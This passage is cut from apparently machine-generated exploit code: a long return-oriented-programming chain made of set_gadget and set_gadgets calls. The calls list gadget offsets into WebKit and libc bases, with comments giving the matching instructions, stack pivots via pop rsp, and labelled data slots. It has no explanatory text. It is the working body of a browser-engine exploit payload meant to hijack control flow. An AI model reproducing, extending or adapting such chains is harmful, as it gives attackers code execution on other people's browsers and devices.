ropchain+495896, //L10785
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10785:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10787:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+496016, //L10788
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+496032, //L10790
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10788:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10790:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+496208, //L10793
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+496224, //L10794
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+496176, //L10791
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+496192, //L10792
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10791:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10792:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10793:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10794:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+496304, //L10795
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+496320, //L10796
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10795:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10796:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+496400, //L10797
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+496416, //L10798
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10797:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10798:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+496576, //L10802
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+496544, //L10800
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+496560, //L10801
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10799:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L10800:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10801:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10802:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+496632, //L10804
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L10804:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+496760, //L10806
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+496776, //L10807
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+496744, //L10805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10805:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10806:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10807:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+496856, //L10808
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+496872, //L10809
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10808:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10809:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+496968, //L10811
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+496952, //L10810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10810:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10811:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+497048, //L10812
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10812:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10814:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+497168, //L10817
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+497152, //L10815
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10815:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10817:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+497248, //L10819
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+497280, //L10821
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10819:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L10820:
ropchain+497408, //L10818
libc_base+144605 //pop rdi
]);
//L10821:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+497384, //L10823
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+497400, //L10822
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L10823:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L10822:
db([0, 0]); // 0x0
//L10818:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+497480, //L10824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10824:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10826:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+497600, //L10829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+497584, //L10827
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10827:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10829:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+497776, //L10832
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+497792, //L10833
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+497744, //L10830
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+497760, //L10831
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10830:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10831:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10832:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10833:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+497888, //L10835
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+497872, //L10834
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10834:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10835:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10836:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L10837:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L10838:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+498088, //L10840
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10840:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+498144, //L10841
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10841:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+498280, //L10845
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+498264, //L10844
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10843:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10844:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10845:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+498416, //L10848
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+498448, //L10850
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+498400, //L10847
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10847:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10848:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10849:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10850:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+498560, //L10851+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+498552, //L10851
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L10851:
db([0, 0]); // 0x0
set_gadgets([
ropchain+498576, //L10851+24
ropchain+502600, //L10846
//L10852:
libc_base+764760, //pop rsi
ropchain+498616, //L10853
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10853:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10855:
db([4294967220, 4294967295]); // -0x4c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+498736, //L10858
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+498720, //L10856
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10856:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10858:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+498912, //L10861
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+498928, //L10862
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+498880, //L10859
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+498896, //L10860
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10859:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10860:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10861:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10862:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+499024, //L10864
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+499008, //L10863
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L10863:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10864:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+499112, //L10866
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L10865:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L10866:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+499168, //L10867
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10867:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10869:
db([4294967220, 4294967295]); // -0x4c
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+499248, //L10871
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10871:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+499384, //L10874
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+499368, //L10873
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10872:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10873:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10874:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+499488, //L10876
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+499472, //L10875
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10875:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10876:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+499568, //L10877
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10877:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10879:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+499688, //L10882
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+499672, //L10880
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10880:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10882:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+499864, //L10885
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+499880, //L10886
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+499832, //L10883
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+499848, //L10884
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10883:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10884:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10885:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10886:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+500040, //L10890
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+500008, //L10888
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+500024, //L10889
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10887:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L10888:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10889:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10890:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+500128, //L10891
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+500144, //L10892
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10891:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10892:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+500320, //L10894
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+500336, //L10895
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+500304, //L10893
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L10893:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10894:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10895:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+500448, //L10897
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+500496, //L10900
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+500464, //L10898
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L10897:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10898:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10899:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10900:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+500608, //L10901+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+500600, //L10901
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L10901:
db([0, 0]); // 0x0
set_gadgets([
ropchain+500624, //L10901+24
ropchain+502568, //L10896
libc_base+764760, //pop rsi
ropchain+500664, //L10902
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10902:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10904:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+500784, //L10907
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+500768, //L10905
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10905:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10907:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+500928, //L10910
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+500896, //L10908
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+500912, //L10909
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10908:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10909:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10910:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+501008, //L10911
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10911:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10913:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+501128, //L10916
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+501112, //L10914
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10914:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10916:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+501272, //L10919
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+501240, //L10917
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+501256, //L10918
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10917:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10918:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L10919:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+501360, //L10921
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L10920:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L10921:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+501416, //L10922
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10922:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10924:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+501496, //L10926
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10926:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+501608, //L10927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L10927:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10929:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+501728, //L10932
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+501712, //L10930
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L10930:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10932:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+501872, //L10935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+501840, //L10933
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+501856, //L10934
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L10933:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
